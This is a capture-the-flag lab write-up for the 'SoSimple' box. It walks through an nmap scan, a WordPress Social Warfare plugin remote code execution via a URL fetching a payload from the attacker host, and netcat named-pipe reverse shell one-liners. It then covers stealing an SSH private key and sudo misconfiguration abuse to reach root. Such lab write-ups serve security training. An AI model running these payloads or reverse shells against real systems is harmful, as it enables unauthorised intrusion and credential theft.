🐧SoSimple

192.168.90.78

Enumeration

Nmap scan

nmap 192.168.90.78 -p- -sV -Pn -A

No banner

Running wpscan found that wordpress had vulnerable Social Warfare plugin installed. Source: https://github.com/shad0w008/social-warfare-RCE

http://192.168.90.78/wordpress/wp-admin/admin-post.php?rce=id&swp_debug=load_options&swp_url=http://192.168.49.90:8000/test.txt

<pre>system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.49.90 80 >/tmp/f')</pre>

Had a shell.. Box timed out... Thanks Offsec. New IP 192.168.105.78

Upgraded shell

/usr/bin/script -qc /bin/bash /dev/null

Found max's ssh key in /home/max/.ssh/id_rsa. SSH back in as max.

Max's sudo perms.

Was able to switch user's to steven.

sudo -u steven /usr/bin/service ../../bin/sh

Found that /opt/tools/server-health.sh did not exist. Made the directories then made the reverse shell.

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.49.105 5555 >/tmp/f' > server-health.sh

Ran server-health.sh as root using.

sudo -u root /opt/tools/server-health.sh

Did not have to use a write up or hint to root this box.

Last updated 3 years ago